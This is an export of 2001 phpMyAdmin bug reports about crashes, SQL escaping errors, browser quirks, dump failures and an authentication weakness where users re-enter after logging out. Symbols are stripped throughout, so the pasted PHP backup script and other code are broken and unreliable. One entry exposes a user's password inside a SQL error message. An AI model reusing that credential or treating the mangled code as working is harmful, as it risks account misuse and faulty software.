Ruediger Schoon amp;lt;schoon at iq consult.com amp;gt; Win 2K, Apache 1.3.20 PHP 4.0.6 as a module, ZendOptimizer 1.1.0, MySQL 3.23.32 phpMyAdmin 2.2.0 no problem with 2.0.5) browser independent it occurs with MSIE, Netscape and Opera).
amp;quot;If there are tables with blob fields bowsing sometimes) and editing mostly) causes Apache to crash.
amp;quot; 2\.
Dave Vogel amp;lt;dvogel150 at hotmail.com amp;gt; WinNT4.0 SP6 no problem with Win98) with PHP loaded as a module in Apache no problem with php used in cgi mode) phpMyAdmin 2.2.0 no problem with 2.1.0) amp;quot;EVERY SQL statement that I type in the textarea box that returns 0 rows crashes Apache.
amp;quot; 3\.
Bernhard amp;lt;b at eudaimonia.nu amp;gt; Win2k pro, PHP 4.0.4 CGI) on Apache 1.3.20 phpMyAdmin 2.2.0 no problem with 2.0.5) amp;quot;If i point my browser to the phpmyadmin 2.2.0 on localhost the php.exe crashes and all i see is the evil 500 error.
amp;quot; 4\.
Anonymous user at the bug tracker bug 457173) Win2k sp2, PHP 4.0.6 on Apache 1.3.20, MySQL 3.23.39 phpMyAdmin 2.2.0 no problem with 2.2.0 rc3 or 4) IE5.5 sp2 amp;quot;When trying to edit a row with a medium blob, PHP quits php.exe has generated......) Even if I do not select the blob field prior to trying to edit the field.
I use cfgShowBlob = FALSE; cfgProtectBlob = TRUE; amp;quot; Original URL https sourceforge.net p phpmyadmin bugs 166 https sourceforge.net p phpmyadmin bugs 166 Original author loic1 Found in version 2.2.0","bug"
"24444","6536","2.2.0) Users Permission.
I have created a user amp;quot;public usr amp;quot; with a password amp;quot;usr public amp;quot; using the phpmyadmin with just INSERT, UPDATE, SELECT and DELETE permission without giving a specific database.
The creation goes on normaly.
I tried to give special permissions to my new user Only INSERT, UPDATE, SELECT and DELETE on the amp;quot;public amp;quot; database but I ve clicked on the validate button the MySQL server crashed!
I restarted it without any problem except that my user haven t got the new privileges I tried to give it.
Then I tried to reload my page on IE but the server crashed once more.
So I restarted it once more and I created my user using the mysql command line interface.
After that I wanted to see my new user in phpMyAdmin, I clicked on mysql Database and clicked on the user table just before I saw that the table was amp;quot;in use amp;quot;.
The server crashed and I think it corrupt the user table when crashing.
I don t know if you have enough explanation to be able to find a bug but I give you my email adresse for more information douglas.six free.fr) Thanks for work.
Douglas.
Original URL https sourceforge.net p phpmyadmin bugs 167 https sourceforge.net p phpmyadmin bugs 167 Original author anonymous Found in version 2.2.0","bug"
"24444","6537","some character values stripped at save.
I entered this value into a field and the amp;quot; amp;quot; sign is removed when I save it http www.goto.com d search p go ?
Keywords=pinhole photography This data was originally entered in the previous stable release 2.1 ?).
Original URL https sourceforge.net p phpmyadmin bugs 168 https sourceforge.net p phpmyadmin bugs 168 Original author anonymous Found in version 2.2.0","bug"
"24444","6538","2.2.0) wrong counted rows with quot;group quot; queries.
phpMyAdmin ignores the amp;quot;GROUP BY amp;quot; feature of MySQL when it calculates the number of rows of the query.
The number of rows phpMyAdmin prints out is the result for the same query without the amp;quot;GROUP BY amp;quot;.
I hope you understand, what I mean.
Original URL https sourceforge.net p phpmyadmin bugs 169 https sourceforge.net p phpmyadmin bugs 169 Original author korelstar Found in version 2.2.0","bug"
"24444","6539","some javascript confirmations not useful.
phpMyAdmin 2.2.1 dev on Win2k I think the javascript confirmation before running sql queries, that were entered through the textbox, is not very useful.
Example Create a dump of a medium size db but don t send it instead get the dump on the screen).
Select it, copy it to the clipboard and paste it into the text box for manual sql queries.
Then hit amp;quot;Go amp;quot;.
A javascript confirmation windows pups up asking you, if you really want to... Now if the dump is long enough, you can t hit the OK button of that confirmation box any more since it s below the lowser screen border and therfor you can t execute the query.
Maybe this is a place where phpMyAdmin should not ask for confirmation especially since anybody who typed something surely knows what he she does.)
regards, matthias Original URL https sourceforge.net p phpmyadmin bugs 170 https sourceforge.net p phpmyadmin bugs 170 Original author anonymous Found in version 2.2.0","bug"
"24444","6540","2.2.1 dev) wrong maxlength in table change.php.
In dev 2.2.1 The maxlength for input is always 40!
lines 331 353) Original URL https sourceforge.net p phpmyadmin bugs 171 https sourceforge.net p phpmyadmin bugs 171 Original author artmus","bug"
"24444","6541","2.2.1 dev) Comments changes for display tbl.lib.php.
Hi, CVS as 2001 09 13 18 25 59 Line 17 syntetic = amp;gt; synthetic Line 31 below = amp;gt; above And not sure it s a typo or a misunderstanding from me but Lines 32 34 seem to be wrong with Lines 41 42 ...
Regards, Alain.
Original URL https sourceforge.net p phpmyadmin bugs 172 https sourceforge.net p phpmyadmin bugs 172 Original author hal0802","bug"
"24444","6542","Dump DB.
Hello, my system gives me an error when dumping a large table.
It says Mysql run out of memory, and so I wrote a script thats makes a dump... but theres still one problem It hangs after about 9000 fields of a table.
you will see the problem at the script below.
2 important lines are marked out.
Without these 2 lines the script runs as is should, but of course, it saves no data... when i reactivate this 2 lines, the script hangs after about 8000 9000 fiels of a table...
I dontxc2xb4t know why, i only think it could be a memory problem with the variables... do you have an idea?
Thx Chris amp;lt;?
mySQL variables dbhost= amp;quot;localhost amp;quot;; dbuser= amp;quot;me amp;quot;; dbpass= amp;quot;password amp;quot;; dbname= amp;quot;DATA amp;quot;; number of backups to keep backups = 10; hours between backups interval = 6; 1 only with ZLib support, else change value to 0 compression = 0; full path to phpMyBackup path= amp;quot;insert here fullpath to this script amp;quot;; DO NOT CHANGE THE LINES BELOW version = amp;quot;0.4 beta amp;quot;; flush ); conn = mysql connect dbhost, dbuser, dbpass) or die mysql error )); path = path .
amp;quot;dump amp;quot;; echo amp;quot; path amp;lt;br amp;gt; amp;quot;; if !is dir path)) mkdir path, 0777); function get def dbname, table) \{ global conn; def = amp;quot; amp;quot;; def .= amp;quot;DROP TABLE IF EXISTS table; \n amp;quot;; def .= amp;quot;CREATE TABLE table \n amp;quot;; result = mysql db query dbname, amp;quot;SHOW FIELDS FROM table amp;quot;, conn); while row = mysql fetch array result)) \{ def .= amp;quot; row[Field] row[Type] amp;quot;; if row[ amp;quot;Default amp;quot;] != amp;quot; amp;quot;) def .= amp;quot; DEFAULT row[Default] amp;quot;; if row[ amp;quot;Null amp;quot;] != amp;quot;YES amp;quot;) def .= amp;quot; NOT NULL amp;quot;; if row[Extra] != amp;quot; amp;quot;) def .= amp;quot; row[Extra] amp;quot;; def .= amp;quot;,\n amp;quot;; \} def = ereg replace amp;quot;,\n amp;quot;, amp;quot; amp;quot;, def); result = mysql db query dbname, amp;quot;SHOW KEYS FROM table amp;quot;, conn); while row = mysql fetch array result)) \{ kname= row[Key name]; if kname != amp;quot;PRIMARY amp;quot;) amp;amp; amp;amp; row [Non unique] == 0)) kname= amp;quot;UNIQUE| kname amp;quot;; if !isset index[ kname])) index[ kname] = array ); index[ kname][] = row[Column name]; \} while list x, columns) = each index)) \{ def .= amp;quot;,\n amp;quot;; if x == amp;quot;PRIMARY amp;quot;) def .= amp;quot; PRIMARY KEY amp;quot; .
implode columns, amp;quot;, amp;quot;) .
amp;quot;) amp;quot;; else if substr x,0,6) == amp;quot;UNIQUE amp;quot;) def .= amp;quot; UNIQUE amp;quot;.substr x,7).
amp;quot; amp;quot; .
implode columns, amp;quot;, amp;quot;) .
amp;quot;) amp;quot;; else def .= amp;quot; KEY x amp;quot; .
implode columns, amp;quot;, amp;quot;) .
amp;quot;) amp;quot;; \} def .= amp;quot;\n); amp;quot;; return stripslashes def)); \} function get content onepart dbname, table, from, howmuch) \{ global conn; global fp; global always; set time limit 600); result = mysql db query dbname, amp;quot;SELECT FROM table LIMIT from, howmuch amp;quot;, conn); while row = mysql fetch row result)) \{ insert = amp;quot;INSERT INTO table VALUES amp;quot;; fwrite fp, insert); for j=0; j amp;lt;mysql num fields result); j ) \{ if !isset row[ j])) insert .= amp;quot;NULL, amp;quot;; else if row[ j] != amp;quot; amp;quot;) ; insert .= amp;quot; amp;quot;.addslashes row [ j]).
amp;quot; , amp;quot;; else insert .= amp;quot; , amp;quot;; \} insert = ereg replace amp;quot;, amp;quot;, amp;quot; amp;quot;, insert); insert .= amp;quot;); \n amp;quot;; fwrite fp, insert); unset insert); unset row); \} result = mysql free result result); unset result); return; \} function get content dbname, table) \{ global conn; global fp; global always; aufeinmal = 500; content= amp;quot; amp;quot;; result =mysql db query dbname, amp;quot;SELECT COUNT ) FROM table amp;quot;, conn); row = mysql fetch array result); anzahlZeilen= row[0]; Rest = anzahlZeilen aufeinmal; Intervalle = anzahlZeilen Rest) aufeinmal; for i = 0; i amp;lt; Intervalle; i ) \{ from= i aufeinmal; get content onepart dbname, table, from, aufeinmal); \} from= Intervalle aufeinmal; content= get content onepart dbname, table, from, Rest); return content; \} set time limit 600); if compression==1) filetype = amp;quot;sql.gz amp;quot;; else filetype = amp;quot;sql amp;quot;; if filemtime path .
amp;quot;0. filetype amp;quot;) amp;lt; time ) interval 3600 amp;amp; amp;amp; !eregi amp;quot; restore\.
amp;quot;, PHP SELF)) || always!= amp;quot; amp;quot;)) \{ for i = backups 1; i amp;gt; 0; i ) \{ oldname = i 1 .
amp;quot;.
filetype amp;quot;; newname = i .
amp;quot;.
filetype amp;quot;; rename path.
oldname, path.
newname); \} cur time=date amp;quot;Y m d H i amp;quot;); newfile= amp;quot; Dump created with phpMyBackup v. version on cur time\r\n amp;quot;; tables = mysql list tables dbname, conn); num tables = mysql num rows tables); i = 0; if compression==1) \{ fp = gzopen path.
amp;quot;0. filetype amp;quot;, amp;quot;w9 amp;quot;); gzwrite fp, newfile); \} else \{ fp = fopen path.
amp;quot;0. filetype amp;quot;, amp;quot;w amp;quot;); fwrite fp, newfile); \} newfile = amp;quot; amp;quot;; while i amp;lt; num tables) \{ table = mysql tablename tables, i); newfile .= amp;quot;\n \n \n amp;quot;; newfile .= amp;quot; structur for table table \n \n amp;quot;; newfile .= get def dbname, table); newfile .= amp;quot;\n\n amp;quot;; newfile .= amp;quot; \n data for table table \n \n amp;quot;; fwrite fp, newfile); newfile .= get content dbname, table); newfile .= amp;quot;\n\n amp;quot;; fwrite fp, newfile); newfile = amp;quot; amp;quot;; i ; \} if compression==1) \{ gzclose fp); \} else \{ fclose fp); \} os=system amp;quot; usr bin mysqldump host= dbhost password= dbpass user= dbuser dbname amp;gt; dump 0.sql amp;quot;); echo filesize path.
amp;quot;0. filetype amp;quot;); echo amp;quot; bytes written for Backup in amp;quot;.
path.
amp;quot;0. amp;quot;.
filetype; \} ?
amp;gt; Original URL https sourceforge.net p phpmyadmin bugs 173 https sourceforge.net p phpmyadmin bugs 173 Original author anonymous Found in version 2.2.0","bug"
"24444","6543","Main frame does not update after dump.
After i dump a database with the option amp;quot;send amp;quot; enabled, the main frame doesn t seem to update when i click an item from te navigation bar.
After refreshing the main frame it updates correctly again.
just a little bug.. ) I m using win2k with ie6 eng).
Original URL https sourceforge.net p phpmyadmin bugs 174 https sourceforge.net p phpmyadmin bugs 174 Original author anonymous Found in version 2.2.0","bug"
"24444","6544","2.2.0) Database list line breaks.
In the list of databases, some databases names will be listed under the if the name is kinda long like amp;quot;phpgroupware amp;quot;) instead of next to it.
The fix is to add amp;lt;nobr amp;gt; amp;lt; nobr amp;gt; in the amp;quot;parent amp;quot; div like was done for the amp;quot;child amp;quot; div s in the left.php file.
Original URL https sourceforge.net p phpmyadmin bugs 175 https sourceforge.net p phpmyadmin bugs 175 Original author chrwei Found in version 2.2.0","bug"
"24444","6545","can t create db with char.
in name.
I ve just installed v2.2.0 and I get some errors querying my database.
FYI It s contain a in its name.
when I try to create a db called amp;quot;test test amp;quot; I get a mysql error amp;quot;Something is wrong in your syntax prxc4x8ds de test inline 1 amp;quot; It seems obviously to be a mysql bug or so) but what is strange is that I created this db with the same version of mysql installed, and an older version of PHPmyadmin, and it worked.
Someone already knows that one ?
Thanks fwed free.fr Original URL https sourceforge.net p phpmyadmin bugs 176 https sourceforge.net p phpmyadmin bugs 176 Original author anonymous Found in version 2.2.0","bug"
"24444","6546","memory allocation php error.
amp;lt;b amp;gt;Fatal error amp;lt; b amp;gt; Allowed memory size of 8388608 bytes exhausted tried to al locate 6961 bytes) in amp;lt;b amp;gt; usr share phpmyadmin lib.inc.php amp;lt; b amp;gt; on line amp;lt;b amp;gt;381 amp;lt; b amp;gt; One of my tables is 120MB.
I m running off of debian unstable In email corispondence, please include amp;quot;phpmyadmin amp;quot; somewhere in the subject.
Original URL https sourceforge.net p phpmyadmin bugs 177 https sourceforge.net p phpmyadmin bugs 177 Original author anonymous Found in version 2.2.0","bug"
"24444","6547","Javascript form events in Mozilla 0.9.4.
When changing user grants user details.php), the drop down lists to select which database and which table have onChange events.
The Go button at the bottom has a onClick event.
Mozilla 0.9.4 seems to be picky about case sensivity.
The first letter of the second word should be capitalized.
So onclick should be onClick and onchange should be onChange.
I have changed this, and that indeed fixes the problem.
Thanks!
Original URL https sourceforge.net p phpmyadmin bugs 178 https sourceforge.net p phpmyadmin bugs 178 Original author spannah Found in version 2.2.0","bug"
"24444","6548","2.2.0) State tracking problem.
I stumbled across a weird usability bug to reproduce; 1) Click on a table in the left frame 2) Do a select against a different table 3) Click edit on one of the results Bingo!
You are presented with an empty schema for the 1st table, and not the schema of the 2nd table filled with the values of the result normal expected behavior) Original URL https sourceforge.net p phpmyadmin bugs 179 https sourceforge.net p phpmyadmin bugs 179 Original author anonymous Found in version 2.2.0","bug"
"24444","6549","2.2.0 not compatible with older MySQL.
3.22.32 does not like LIMIT 1 on UPDATE s tbl replace.php Thu Sep 20 20 40 41 2001 tbl replace.php Thu Aug 30 17 41 56 2001 104,7 104,7 Builds the sql upate query valuelist = ereg replace , , , valuelist); if !empty valuelist)) \{ query = UPDATE .
backquote table) .
SET .
valuelist .
WHERE .
primary key; HACK for old MySQL .
LIMIT 1 ; \ query = UPDATE .
backquote table) .
SET .
valuelist .
WHERE .
primary key .
LIMIT 1 ; message = strAffectedRows .
amp;amp;nbsp; ; \} No change amp;gt; move back to the calling script Original URL https sourceforge.net p phpmyadmin bugs 180 https sourceforge.net p phpmyadmin bugs 180 Original author anonymous Found in version 2.2.0","bug"
"24444","6550","Core dump from PHP engine.
On my old home server with Apache 1.3.14 and PHP 4.0.3 I have a coredump in 2.2.0.
In previous rc x parhaps 5) version everything was ok.
I hasn t debug it.
Regards Original URL https sourceforge.net p phpmyadmin bugs 181 https sourceforge.net p phpmyadmin bugs 181 Original author mizydors","bug"
"24444","6551","2.2.1 dev) Pb.
with table comment as tooltip in left frame.
When the mouse if over the table name in left frame, there should be tool tip display the table comment as tooltip description.
Original URL https sourceforge.net p phpmyadmin bugs 182 https sourceforge.net p phpmyadmin bugs 182 Original author anonymous","bug"
"24444","6552","Error advanced authentication.
If click amp;quot;Log out amp;quot; and canceling authentication request then go to link in address bar you entering the system again.
Original URL https sourceforge.net p phpmyadmin bugs 183 https sourceforge.net p phpmyadmin bugs 183 Original author anonymous Found in version 2.2.0","bug"
"24444","6553","Bug when adding auto increment field.
When adding a new auto increment field to a database, even if the PRIMARY KEY option is ticked, the SQL statment that it executes does not use the PRIMARY KEY option to alter the table.
This results in an error.
An easy one to fix I am sure! )
Oh, also... on this page; http phpmyadmin.sourceforge.net You have mis spelt Developers look at the bottom of the page) amp;quot;Developpers Forum amp;quot; heh keep up the good work all.
Vipersoft Original URL https sourceforge.net p phpmyadmin bugs 184 https sourceforge.net p phpmyadmin bugs 184 Original author vipersoft Found in version 2.2.0","bug"
"24444","6554","2.2.0) Opera browser issue with queries.
I have had problems using the Opera browser version 5.12) and phpMyAdmin 2.2.0.
The first problem seems to be that Opera may post empty form variables whereas Internet Explorer perhaps does not.
In db readdump.php, if you change the line sql file = isset sql file) ?
sql file none ; to sql file = !empty sql file) ?
sql file none ; then queries in Opera and Internet Explorer) now work.
The symptom is that phpMyAdmin reports a query error when quotes are used Database dvitest Error SQL query [Edit] select from rx where reference like \ PETER \ LIMIT 0, 30 MySQL said You have an error in your SQL syntax near \ PETER \ LIMIT 0, 30 at line 1 Back Following the code through, it appears that sql file is set but empty when using Opera.
This causes code that uses the php isset ) function to fail.
Sincerely, Peter Miller pm thedvi.com Original URL https sourceforge.net p phpmyadmin bugs 185 https sourceforge.net p phpmyadmin bugs 185 Original author anonymous Found in version 2.2.0","bug"
"24444","6555","2.2.0) Empty database statistics.
Hi, I have the following installation phpMyAdmin 2.2.0 Apache 1.3.9 mysql 3.22.25 php 4.0.3 When I click on the databse statistics link I get the following apologies for being messy).
You can see the column showing how many tables are in each databse are correct but the subsequent columns that show the data and indexes are not showing anything.
Counters 1 0 Bytes 0 Bytes 0 Bytes bookmarkdb 1 0 Bytes 0 Bytes 0 Bytes craig 2 0 Bytes 0 Bytes 0 Bytes horde 3 0 Bytes 0 Bytes 0 Bytes imp 2 0 Bytes 0 Bytes 0 Bytes maccs 33 0 Bytes 0 Bytes 0 Bytes mysql 6 0 Bytes 0 Bytes 0 Bytes paidsubjects 0 0 Bytes 0 Bytes 0 Bytes test 0 0 Bytes 0 Bytes 0 Bytes tim 0 0 Bytes 0 Bytes 0 Bytes xmbforum xmb 11 0 Bytes 0 Bytes 0 Bytes Sum 11 59 0 Bytes 0 Bytes 0 Bytes Database Total Can anyone suggest why this might be?
Original URL https sourceforge.net p phpmyadmin bugs 186 https sourceforge.net p phpmyadmin bugs 186 Original author anonymous Found in version 2.2.0","bug"
"24444","6556","2.2.0) with galeon right panel is empty.
Using the 2.2.0 with galeon 0.12.2 1.i386.rpm based on mozilla 0.9.4 2.i386.rpm) as downloaded from galeon site and installed on a Red Hat 7.1 with all the updates and Ximian gnome results in a right panel frame always empty, with source equal to amp;lt;html amp;gt; amp;lt;body amp;gt; amp;lt; body amp;gt; amp;lt; html amp;gt; for evey action choosen on the left panel frame.
The exact same installation viewed with mozilla works flawlessy... Hope you can fix this!
Best regards, Massimo Santini Original URL https sourceforge.net p phpmyadmin bugs 188 https sourceforge.net p phpmyadmin bugs 188 Original author anonymous Found in version 2.2.0","bug"
"24444","6557","konqueror 2.2.1.
Hi, konqueror 2.2.1 handles style.display OK, so there is no longer need to set capable=0 for konqueror.
Or maybe add some version checking.
Cheers, Lada Original URL https sourceforge.net p phpmyadmin bugs 187 https sourceforge.net p phpmyadmin bugs 187 Original author anonymous Found in version 2.2.0","bug"
"24444","6558","2.2.0) Disconnected after table changes.
Using 2.2.0 of phpMyAdmin I get a can t connect error from the server, when I make changes to any table, but connection is not lost and the changes are made.
It can be seen when I reload the table in question.
I have clips available showing what happens and a dump of phpinfo ) with the relevant information on the Apache server.
phpinfo ) is attachmed Best regards Niels Oesten niels oesten.dk Original URL https sourceforge.net p phpmyadmin bugs 189 https sourceforge.net p phpmyadmin bugs 189 Original author anonymous Found in version 2.2.0","bug"
"24444","6559","wrong SQL quotes with opera browser.
using phpMyAdmin with opera 5 causes all SQL statements will be escaped.
phpMyAdmin can t execute the statement.
select from parts where IDCust = 5 == amp;gt; select from parts where IDCust = \ 5\ this behavior is independent from the browsers identification settings.
Maybe the browser check routines in phpMyAdmin?
greetings, stefan hofmann Original URL https sourceforge.net p phpmyadmin bugs 190 https sourceforge.net p phpmyadmin bugs 190 Original author noplis","bug"
"24444","6560","Berkeley DB table size not avalaible.
phpMyadmin 2.2.0 MySQL 3.23.42 With the Berkeley DB table type, I can t see the size in bytes) of those tables in the main page of a database.
Original URL https sourceforge.net p phpmyadmin bugs 192 https sourceforge.net p phpmyadmin bugs 192 Original author magoo22 Found in version 2.2.0","bug"
"24444","6561","Directories are installed sgrp.
The directories in the tarball have permissions 2755, should be 755 for normal usage.
E Mail me if there s a reason for it I don t know about ) Original URL https sourceforge.net p phpmyadmin bugs 193 https sourceforge.net p phpmyadmin bugs 193 Original author anonymous Found in version 2.2.0","bug"
"24444","6562","apache process crashes with segfault.
this happens when i try to load the index.php apache 1.3.20 php4.0.6 as libphp4.a) mysql 3.23.37 other web applications using php4 and mysql seem to run fine.
Original URL https sourceforge.net p phpmyadmin bugs 191 https sourceforge.net p phpmyadmin bugs 191 Original author anonymous Found in version 2.2.0","bug"
"24444","6563","Rt frame blank after EDIT, browser crash.
SERVER Apache 1.3.14, PHP 4.0.4pl1, MySQL 3.23.22 beta BROWSER Netscape 4.75 and 6.1 and MSIE 5.5 on Win2K SEQUENCE Select table, select Browse, select Edit; make changes, select Save PROBLEM The right amp;quot;main amp;quot;) frame returns either totally blank white) or with 3 empty white) frames; the source code for each frame contains HTML with the phrase amp;quot;phpMyAdmin is more friendly with a amp;lt;b amp;gt;frames capable amp;lt; b amp;gt; browser.
amp;quot; but nothing is displayed.
The changed data, however, has been saved correctly.
ACTION Click on anything in the left frame database name or table name) and the browser crashes with a Win2K Program Error amp;quot;netscape.exe has generated errors and will be closed by Windows.
You will need to restart the program.
amp;quot; This happens with all 3 browsers.
I ll attach more info as I chase this one ... Bob.
Original URL https sourceforge.net p phpmyadmin bugs 194 https sourceforge.net p phpmyadmin bugs 194 Original author anonymous Found in version 2.2.0","bug"
"24444","6564","questions about select functoin.
At first, thanks for your help.
I found two bugs when I used select function.
1\.
Distinct function can not work well.
2\.
It did not work when using amp;quot;slect....into outfile... amp;quot;.
The version I used is 2.2.1 rc1.
Original URL https sourceforge.net p phpmyadmin bugs 195 https sourceforge.net p phpmyadmin bugs 195 Original author anonymous Found in version 2.2.0","bug"
"24444","6565","Table Aliases.
Table aliases do not work properly or rather, at all).
For instance SELECT a.id,a.field01,b.id02 FROM table01 a, table02 b; Would return an error in the fashion SHOW FIELDS FROM `Database01`.`a` LIKE field01 MySQL said Table Database01.a doesn t exist.
It seems to be interpreting the query incorrectly.
Original URL https sourceforge.net p phpmyadmin bugs 196 https sourceforge.net p phpmyadmin bugs 196 Original author anonymous Found in version 2.2.0","bug"
"24444","6566","2.x.x) FIXED Left Frame not expanding in iCab.
The database items in the left frame of phpMyAdmin 2.2.0 and 2.2.1rc1 do not expand in iCab http www.icab.de) when the sign is clicked.
iCab shows the following error At the amp;amp; after server=1 in the line amp;lt;a class= amp;quot;item amp;quot; href= amp;quot;db details.php?lang=en amp;amp;server=1 amp;amp;db=euswww amp;quot; onclick= amp;quot;if capable) \{expandBase el3 , true); return false;\} amp;quot; amp;gt; iCab shows the error message JavaScript Error 83 68) Primary expression expected Original URL https sourceforge.net p phpmyadmin bugs 197 https sourceforge.net p phpmyadmin bugs 197 Original author chris01","bug"
"24444","6567","2.2.1 rc1) dump error.
Hello, I think I ve found a bug in phpmyadmin.
Simply test this amp;lt; snip amp;gt; CREATE TABLE test test varchar 50) NOT NULL default 0 ) TYPE=MyISAM; INSERT INTO test VALUES 0 ); amp;lt; snip amp;gt; And then get a dump amp;lt; snip amp;gt; CREATE TABLE test test varchar 50) NOT NULL default 0 ) TYPE=MyISAM; INSERT INTO test VALUES ); amp;lt; snip amp;gt; Where is the inserted 0 ?
Bye, Oliver Original URL https sourceforge.net p phpmyadmin bugs 198 https sourceforge.net p phpmyadmin bugs 198 Original author anonymous","bug"
"24444","6568","Create DB from SQL dump failed.
I made a dump from one Server with PhpMyAdmin 2.2.0rc4,MySQL v3.23.40, PHP4.0.6), and tried to create the compelete db at an other Server different installation of PhpMyAdmin 2.2.0 current release, MySQL v3.23.41, PHP4.0.6) but it failed.
I couldn t make a field named amp;quot;order amp;quot;.
This is a problem in the current release.
A search and replace fixed the problem.
SQL Dump phpMyAdmin MySQL Dump version 2.2.0rc4 http phpwizard.net phpMyAdmin http phpmyadmin.sourceforge.net download page) Host localhost Generation Time October 9, 2001, 12 50 am Server version 3.23.40 PHP Version 4.0.6 Database `mutant` Table structure for table `forum cat` CREATE TABLE forum cat id int 10) unsigned NOT NULL auto increment, catname varchar 50) NOT NULL default , order tinyint 4) NOT NULL default 0 , PRIMARY KEY id), UNIQUE KEY id id), KEY id 2 id) ) TYPE=MyISAM; amp;lt;SNIP amp;gt; Original URL https sourceforge.net p phpmyadmin bugs 199 https sourceforge.net p phpmyadmin bugs 199 Original author lucard Found in version 2.2.0","bug"
"24444","6569","2.2.1 rc1) Dumps with binary data dont work mysql.
Dumps which contain binary data dont work with the command line mysql client that is used to do admin on a server.
I have a setup with automated backup scripts which pull a data dump from a phpMyAdmin install on the server and dump the database into a local server for backup and development purposes.
Somewhere in the 2.2.0 development this process broke, with the inserts failing at various spots depending upon unbalanced quotes.
This used to work fine with 2.1.0 and still does, I ve setup a 2.1 install to do the backups with, but id really rather have only one install, as 2.2.0 has much nice improvements).
The binary data in question is images, gif, jpg, and png.
Original URL https sourceforge.net p phpmyadmin bugs 200 https sourceforge.net p phpmyadmin bugs 200 Original author fruitcak Found in version 2.2.0","bug"
"24444","6570","all) no fix needed cfgServers not an array.
I get an error message after configuring phpMyAdmin 2.2.1rc1.
It authenticates me, but then says amp;quot;Warning Variable passed to reset ) is not an array or object in home ebs public html DB phpMyAdmin libraries common .lib.php on line 241 amp;quot; I have put the main amp;quot;config.inc.php amp;quot; file in the root directory and already changed the locations for where the include file in amp;quot;common.lib.php amp;quot; looks for it.
When I look at amp;quot;config.inc.php amp;quot;, cfgServers[1] [ value ] = ; looks very much like an array, but the browser is saying it is not.
The phpinfo file is at http home.apu.edu ebs DB phpMyAdmin phpinfo.php Any suggestions?
Can you help?
Sincerely, Timothy Hahs Brinkley His son1 yahoo.com Original URL https sourceforge.net p phpmyadmin bugs 201 https sourceforge.net p phpmyadmin bugs 201 Original author anonymous","bug"
"24444","6571","File \\php2 not found Errcode 2).
When I try amp;quot;insert text file into table amp;quot; I recived the msg LOAD DATA LOCAL INFILE \\\\php2 REPLACE INTO TABLE `correoaereo` FIELDS TERMINATED BY , OPTIONALLY ENCLOSED BY amp;quot; LINES TERMINATED BY \r MySQL ha dicho File \\php2 not found Errcode 2) How can i do????
Original URL https sourceforge.net p phpmyadmin bugs 202 https sourceforge.net p phpmyadmin bugs 202 Original author anonymous Found in version 2.2.0","bug"
"24444","6572","phpMyAdmin Hangs Apache on windows 98SE.
When I use phpMyAdmin 2.2.1 rc1, Apache often hangs.
My System PIII 800 133Mhz) SDRAM 256 MB MSI Windows 98SE Apache 1.3.19 10319100) PHP Version 4.0.5RC1 MySql 3.23.32 Original URL https sourceforge.net p phpmyadmin bugs 203 https sourceforge.net p phpmyadmin bugs 203 Original author anonymous","bug"
"24444","6573","Insert new row error.
I m using phpMyAdmin 2.2.0 mySQL 3.23.41nt PHP 4.06 win2k server Apache 1.3.20 port 81 IIS 5.0 port 80 When inserting a new row into a table, it shows that the row has been inserted but on refreshing the same page it is not there anymore.
It was working until I came to record no.276.
A bug?
d I do something wrong?
No problems using phpMyAdmin 2.1.0 Chris Original URL https sourceforge.net p phpmyadmin bugs 204 https sourceforge.net p phpmyadmin bugs 204 Original author anonymous Found in version 2.2.0","bug"
"24444","6574","extension loaded not in 3.0.9.
The lib.inc.php has the following code Loads the mysql extensions if it is not loaded yet staybyte 26.
June 2001 if PHP INT VERSION amp;gt;= 30009) \{ if PMA WINDOWS) \{ suffix = .dll ; \} else \{ suffix = .so ; \} if PHP INT VERSION amp;lt; 40000) \{ extension = MySQL ; \} else \{ extension = mysql ; \} if !
extension loaded extension) amp;amp; amp;amp; !
get cfg var safe mode ) amp;amp; amp;amp; function exists dl )) \{ dl extension.
suffix); \} if !
extension loaded extension)) \{ echo strCantLoadMySQL; exit ); \} \} end load mysql extension This code assumes that extension loaded is available in PHP 3.0.9, which is not true.
Because of this issue phpMyAdmin 2.2.0 will not work under PHP 3.0.9 at all.
All pages including this file will return nothing to the browser.
Original URL https sourceforge.net p phpmyadmin bugs 205 https sourceforge.net p phpmyadmin bugs 205 Original author scurtescu","bug"
"24444","6575","denied to mysql user db.
AdvAuth failed.. Hi Guys, You are doing such a good job on this project!
It looks awesome!
I am very impressed with it.
If you want to make phpMyAdmin available to users without Administrative access, you will probably need to make the Advanced Authentication user name and passwords hard coded.
What I mean is have a file where I can specify the username and password that I want to use to access the databases and NOT go to the amp;quot;mysql user databse amp;quot; to get the username and password.
For example, I do not have Administrative access so when I go to load myPhpAdmin it gives me the following error ========================================= Error SQL query SELECT User, Password, Select priv FROM mysql.user WHERE User = educabs AND Password = PASSWORD 3duca6s ) MySQL said Access denied for user educabs home.apu.edu to database mysql =========================================== What I understand it to be saying is that because educabs home.apu.edu does not have access to database mysql , it cannot authenticate me.
Make sense?
Thanks Again.
Great Work!
Timothy Original URL https sourceforge.net p phpmyadmin bugs 206 https sourceforge.net p phpmyadmin bugs 206 Original author anonymous","bug"
"24444","6576","2.2.1 rc2) Login password bug.
When trying to log in via advanced authentication, it gives an error with passwords holding a .
f.e.
user testing pass op; 1234 error one escaping slash too many I guess) SQL query SELECT User, Password, Select priv FROM mysql.user WHERE User = testing AND Password = PASSWORD op;\\ 1234 ) MySQL retourneerde You have an error in your SQL syntax near 1234 ) at line 1 Original URL https sourceforge.net p phpmyadmin bugs 207 https sourceforge.net p phpmyadmin bugs 207 Original author anonymous Found in version 2.2.0","bug"
"24444","6577","2.2.1rc2) czech version css headers.
both may affect other int l versions, haven t checked though) Style it d be better to write quotation marks around the name of the CE fonts amp;quot;Arial CE amp;quot; insteda of Arial CE.
Header at least with IE it sends wrong characters to the database, if the page isn t declared to be windows 1250 or something eastern europe).
Thanks.
Original URL https sourceforge.net p phpmyadmin bugs 208 https sourceforge.net p phpmyadmin bugs 208 Original author mojzis Found in version 2.2.0","bug"
"24444","6578","2.2.1rc2 Doc can t be opened in IE5 Mac.
IE5 for Mac is one of the few browsers that actually check the DOCTYPE definition at the beginning of a HTML file.
Documentation.html refers to amp;quot;DTD xhtml1 transitional.dtd amp;quot;, but there s no such file not even a subdirectory titled amp;quot;DTD amp;quot;) and thus IE5 refuses to open the file.
Original URL https sourceforge.net p phpmyadmin bugs 209 https sourceforge.net p phpmyadmin bugs 209 Original author anonymous","bug"
